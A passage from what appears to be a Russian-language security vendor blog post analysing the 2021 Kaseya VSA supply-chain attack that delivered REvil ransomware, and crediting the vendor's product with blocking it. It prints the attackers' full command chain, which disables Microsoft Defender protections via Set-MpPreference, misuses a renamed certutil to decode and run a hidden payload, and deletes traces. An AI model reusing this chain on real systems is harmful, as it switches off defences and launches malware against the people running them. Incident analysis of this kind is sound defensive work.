Около 50 клиентов Kaseya (в основном MSP) используют on-premise версию VSA, и поэтому их серверы были скомпрометированы в первую очередь. В результате пострадало около миллиона представителей малого бизнеса, которые являлись клиентами соответствующих провайдеров, а сами MSP начали
серьезно беспокоиться, ведь сервис не удавалось восстановить несколько дней. Кстати, как раз об этом мы говорили
Acronis Cyberthreats Report 2020: сегодня провайдерам необходимо не только отчитываться о взломах и утечках, но также принимать меры, чтобы защитить своих клиентов от будущих угроз.
Но тут возникает вопрос: а можно ли было защититься от угрозы, которая в итоге на несколько дней вывела из строя огромное количество систем по всему миру?
Вариант Acronis Атака произошла 2 июля 2021 и один из наших клиентов, использующий систему защиты от Acronis, также попал "под раздачу". Коллеги разрешили поделиться информацией о ходе атаки, которую мы раскрываем дальше.
По данным анализа первоначально вредоносное ПО попало в сеть компании вместе с обновлением Kaseya VSA, подписанным действующим цифровым сертификатом.
В систему попал компонент REvil Ransomware, но поскольку система Acronis Detection and Response была настроена на "нулевое доверие", решение обнаружило аномальную активность и заблокировало работу нового ПО до момента разрешения проблемы со стороны персонала. В результате, несмотря на то, что атака REvil была запущена сертифицированным обновлением Kaseya VSA, системы пользователя не пострадали.
Подробные данные об атаке Установленная система защиты обнаружила следующие действия вредоносного ПО:
1. C:\program files (x86)\kaseya\[CUSTOMER ID]\agentmon.exe
- Обновление было запущено через агента Kaseya. Так называемый "Kaseya VSA Agent Hot-fix" вызвал командную строку и запустил код. Обновление, требующее прав администратора на запуск, было подготовлнео хакерами за счет доступа к консоли Kaseya VSA через новый эксплойт нулевого дня.
2. Cmd.exe
- Строка cmd.exe была вызвана для запуска следующих команд:
"C:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5236 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Set-MpPreference -DisableRealtimeMonitoring $true
-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
-DisableScriptScanning $true -EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
-SubmitSamplesConsent NeverSend & copy /Y
C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
- Запуск скрипта PowerShell сопровождался командой "ping localhost", которая часто используются в качестве паузы.
3. Powershell.exe
- Powershell была запущена через cmd.exe со следующими параметрами
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend - Цель этого действия — отключить различные функции безопасности Microsoft Defender.
- И именно на этом этапе сработало обнаружение Acronis (на картинке ниже).